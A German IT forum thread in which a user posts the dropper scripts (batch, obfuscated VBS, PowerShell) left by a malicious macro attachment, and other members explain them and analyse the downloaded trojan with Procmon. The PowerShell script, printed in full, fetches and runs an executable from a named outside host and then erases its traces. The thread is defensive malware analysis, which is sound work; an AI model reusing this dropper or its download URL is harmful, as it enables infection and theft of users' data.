Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst Kann mir das jemand erläutern?

Mitglied: Xaero1982

Xaero1982 (Level 4) - Jetzt verbinden

07.11.2014, aktualisiert 10.11.2014, 1846 Aufrufe, 15 Kommentare

Moin,

heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.

-> VM an -> Office drauf -> Spaß

Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:

444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat

01.
@echo off 
02.
ping 1.1.2.2 -n 2 
03.
cscript.exe "c:\windows\temp\adobeacd-update.vbs" 
04.
exit
adobeacd-update.vbs
01.
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName))) 
02.
caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = "231" 
03.
Set objFSO=CreateObject("Scripting.FileSystemObject") 
04.
currentFile = "c:\windows\temp\adobeacd-update.ps1" 
05.
caisudkh38e = "231" 
06.
quid8hiqje = "231" 
07.
Set objShell = CreateObject("Wscript.shell") 
08.
caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd = "231" 
09.
objShell.run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true 
10.
caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = "231"
adobeacd-update.ps1
01.
$hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3'; 
02.
$hash = '0'; 
03.
$down = New-Object System.Net.WebClient; 
04.
$url  = 'http://idtvietnam.vn/images/ork.exe'; 
05.
$hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd'; 
06.
$file = 'c:\windows\temp\444.exe'; 
07.
$hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd'; 
08.
$down.DownloadFile($url,$file); 
09.
$ScriptDir = $MyInvocation.ScriptName; 
10.
$someFilePath = 'c:\windows\temp\' + '444.exe'; 
11.
$vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.vbs'; 
12.
$batFilePath = 'c:\windows\temp\' + 'adobeacd-update.bat'; 
13.
$psFilePath = 'c:\windows\temp\' + 'adobeacd-update.ps1'; 
14.
Start-Sleep -s 10; 
15.
cmd.exe /c  'c:\windows\temp\444.exe';      
16.
$file1 = gci $vbsFilePath -Force 
17.
$file2 = gci $batFilePath -Force 
18.
$file3 = gci $psFilePath -Force 
19.
$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden 
20.
$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden 
21.
$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden 
22.
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath } 
23.
If (Test-Path $batFilePath){ Remove-Item $batFilePath } 
24.
If (Test-Path $someFilePath){ Remove-Item $someFilePath } 
25.
Remove-Item $MyINvocation.InvocationName
Was genau macht das?
Mitglied: colinardo
LÖSUNG 07.11.2014, aktualisiert 10.11.2014
Hi Xaero,
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:

Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe'" die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.

Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern" . Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !

Grüße Uwe

p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus
Bitte warten ..
Mitglied: Xaero1982
07.11.2014 um 22:40 Uhr
Also so wirklich klar was die 444.exe macht ist mir nicht... jedenfalls hats die VM zerlegt

VirtualMachine sagt: Ein schwerwiegender Fehler ist aufgetreten, und die Ausführung der vM wurde unterbrochen.

-> Logs gucken

Kann man rausbekommen was die 444.exe macht?

Danke erst mal

Grüße
Bitte warten ..
Mitglied: colinardo
07.11.2014, aktualisiert um 22:46 Uhr
Zitat von Xaero1982:
Kann man rausbekommen was die 444.exe macht?
  • Olydbg anwerfen
  • File durch den Disassembler jagen
  • Gleichzeitig Procmon laufen lassen

Was für lange Winterabende

Schönes Wochenende
Grüße Uwe
Bitte warten ..
Mitglied: Xaero1982
07.11.2014, aktualisiert um 22:57 Uhr
Procmon mit welchem Filter?

Danke, dir auch

Grüße

und vor allem was mach ich damit? also mit dem Ollydbg
Bitte warten ..
Mitglied: colinardo
07.11.2014, aktualisiert um 22:56 Uhr
Zitat von Xaero1982:
Procmon mit welchem Filter?
Na zuerst mal auf den Prozess 444.exe, später dann auf andere je nachdem was das Teil so macht ...
Bitte warten ..
Mitglied: Xaero1982
07.11.2014 um 23:16 Uhr
Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
Bitte warten ..
Mitglied: colinardo
08.11.2014, aktualisiert um 08:54 Uhr
Zitat von Xaero1982:

Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
wenn du jetzt noch nach Category = "Write" filterst siehst du was er eventuell verändert. Könnte aber auch ein einfacher Datendieb sein der in Dateien und Registry-Einträgen nach Passwörtern scannt und diese an den CC-Server sendet.
Lad das Teil doch einfach mal auf VirusTotal.com hoch, ob es schon in den Definitionen der AntiVirus-Hersteller verzeichnet ist.

Aber wahrscheinlich willst du damit nur etwas üben, gelle
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 09:42 Uhr
Schau ich mal mit dem Filter... danke

Naja ich will eigentlich wissen was der Spaß macht... üben... joa auch das

https://www.virustotal.com/de/file/59b2bc1bdf983b47bad926ef3808f9493c100 ...
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 10:04 Uhr
Das kam bei raus:

01.
"Time of Day","Process Name","PID","Operation","Path","Result","Detail" 
02.
"09:53:33,1463901","ork.exe","2380","RegSetValue","HKLM\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size","SUCCESS","Type: REG_SZ, Length: 12, Data: 65536" 
03.
"09:53:33,5291740","ork.exe","2380","CreateFile","C:\Users\Administrator\Desktop\","NAME INVALID","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: 0" 
04.
"09:53:38,4024746","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Read, Disposition: Create, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: None, AllocationSize: 0, OpenResult: Created" 
05.
"09:53:38,4027583","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Write, AllocationSize: 0, OpenResult: Overwritten" 
06.
"09:53:38,4028118","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 0, Length: 9, Priority: Normal" 
07.
"09:53:38,4029443","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 9, Length: 8" 
08.
"09:53:38,4029526","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 9, Length: 8, Priority: Normal" 
09.
"09:53:38,4029708","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 17, Length: 9" 
10.
"09:53:38,4029772","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 17, Length: 9, Priority: Normal" 
11.
"09:53:38,4029884","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 26, Length: 1" 
12.
"09:53:38,4029945","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 26, Length: 1, Priority: Normal" 
13.
"09:53:38,5466385","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0" 
14.
"09:53:38,5466503","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer","NAME NOT FOUND","" 
15.
"09:53:38,5466579","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride","NAME NOT FOUND","" 
16.
"09:53:38,5466637","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL","NAME NOT FOUND","" 
17.
"09:53:38,5466692","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect","NAME NOT FOUND","" 
18.
"09:53:38,5468236","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings","SUCCESS","Type: REG_BINARY, Length: 56, Data: 46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00" 
19.
"09:54:03,4389855","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Installer\Products\B808096432\LP","SUCCESS","Type: REG_SZ, Length: 100, Data: C:\Users\ADMINI~1\AppData\Local\Temp\1\L808096432" 
20.
 
Bitte warten ..
Mitglied: colinardo
08.11.2014, aktualisiert um 12:42 Uhr
dann schau mal was das Teil in die Temp-Datei tmp74A4.tmp schreibt, ich vermute es dupliziert sich als Backup.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.

Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.

Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 18:00 Uhr
Also damit kann sich wohl niemand nen Ei machen:

01.
[0] 
02.
LP=C:\Users\ADMINI~1\AppData\Local\Temp\L808096432 
03.
[2] 
04.
D=0 
05.
OS=Windows Server 2012  / 64 bit 
06.
FS=NTFS 
07.
VID=808096432 
08.
M=1 
09.
[1] 
10.
ID=101 
11.
D=08.11.2014 
12.
T=17:49:29 
13.
CPID=3776 
14.
CFN=C:\Users\Administrator\Desktop\ork.exe 
15.
PPID=3096 
16.
PFN=cmd.exe 
17.
CDR=C:\Users\Administrator\Desktop 
18.
CUSR=HOME\administrator 
19.
EUSR=HOME\administrator 
20.
LVL=HIGH
Nach Hause telefoniert da irgendwie nix...

Link zum runterladen der exe is oben xD
Bitte warten ..
Mitglied: colinardo
08.11.2014, aktualisiert 10.11.2014
Das ist ein Trojaner der sensitive Informationen über sein Opfer stiehlt:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471

Win32/Rovnix is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine. It uses techniques common among rootkits.
Die Übermittlung muss nicht immer direkt stattfinden, das lässt sich meistens erst sagen wenn man den über einen längeren Zeitraum beobachtet. Es kann auch sein das der Server schon vom
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
Bitte warten ..
Mitglied: Xaero1982
08.11.2014 um 21:19 Uhr
Danke für den Link:

Win32/Rovnix not found
Bitte warten ..
Mitglied: C.R.S.
10.11.2014 um 16:54 Uhr
Zitat von Xaero1982:
Nach Hause telefoniert da irgendwie nix...

DNS-Request übersehen! optimalnewbie.co.uk ist aber schon länger trocken gelegt.
Bitte warten ..
Mitglied: Xaero1982
10.11.2014 um 18:12 Uhr
Könntest du recht haben, dass mir da sowas über den Weg gelaufen ist...
Bitte warten ..
Ähnliche Inhalte
Viren und Trojaner
Locky - hat ihn jemand für mich?
Frage von pelzfruchtViren und Trojaner25 Kommentare

Abend, klingt jetzt vielleicht etwas verdreht, aber ich wollte fragen ob mir jemand (per PM?) den Verschlüsselungstrojaner zuschicken könnte. ...

E-Mail

Verschickt da jemand spam unter meiner mailadresse?

Frage von 71856E-Mail3 Kommentare

Hallo Zusammen, seit einigen Tagen erhalte ich ständig Mails die in etwa wie folgt aussehen. Gehe ich recht in ...

Grafikkarten & Monitore

Sichtschutzfilter für Monitore - hat damit jemand Erfahrung?

gelöst Frage von departure69Grafikkarten & Monitore10 Kommentare

Hallo. ich bin der Sysadmin einer kleinen Behörde. In unserem Einwohnermeldeamt bemängeln meine User, daß die Kundschaft dem Sachbearbeiter ...

Drucker und Scanner

Kann jemand einen (Chip-)Kartendrucker empfehlen ?

Frage von SuriViruSDrucker und Scanner1 Kommentar

Wir haben hier ein(en) Zebra P110i im Büro, der spinnt langsam rum. Falls jemand Praxiserfahrung in dem Bereich hat ...

Neue Wissensbeiträge
Windows 10

Neue Sicherheitslücke in Windows 10 (Version 1709) durch Google öffentlich geworden

Information von kgborn vor 2 StundenWindows 10

Vor ein paar Tagen haben Googles Sicherheitsforscher vom Projekt Zero eine Sicherheitslücke im Edge-Browser publiziert. Jetzt wurde eine weitere ...

iOS
IOS 11.2.6 verfügbar
Information von sabines vor 8 StundeniOS

Mit dem Update soll der Bug behoben werden, bei dem eine bestimmte Zeichenkette IOS zum Absturz gebracht hat.

Sicherheit
Sicherheitsrisiko: Die Krux mit 7-Zip
Information von kgborn vor 22 StundenSicherheit8 Kommentare

Bei vielen Anwendern ist das Tool 7-Zip zum Entpacken von Archivdateien im Einsatz. Die Software ist kostenlos und steht ...

Internet

Datendealing im WWW Tracking Methoden immer brutaler

Information von sabines vor 1 TagInternet

Interessanter Artikel zum Thema Tracking im WWW und die immer "besseren" Methoden des Trackings. Professor Arvind Narayanan (Princeton-Universität) betreibt ...

Heiß diskutierte Inhalte
Server
Route-Befehl Unterstützung (unter CMD)
gelöst Frage von FKRR56Server38 Kommentare

Guten Tag , i.M. habe ich Probleme über den CMD-Route-Befehl ein Routing auf einen entfernten Server zuzulassen. Der Server ...

Router & Routing
LANCOM VPN CLIENT einrichten
Frage von Finchen961988Router & Routing27 Kommentare

Hallo, ich habe ein Problem und hoffe ihr könnt mir helfen, wir haben einen Kunden der hat einen Speedport ...

LAN, WAN, Wireless
VPN Cisco ASA5505 PaloAlto PA-200
gelöst Frage von YannoschLAN, WAN, Wireless21 Kommentare

Hallo zusammen, ich würde gerne ein Site-to-Site VPN zwischen den beiden Standorten aufbauen. PaloAlto PA200 Internetanschluss Deutsche Telekom GK ...

Microsoft
TV-Tipp: Das Microsoft-Dilemma
Information von kgbornMicrosoft17 Kommentare

Aktuell gibt es in Behörden und in Firmen eine fatale Abhängigkeit von Microsoft und dessen Produkten. Planlos agieren die ...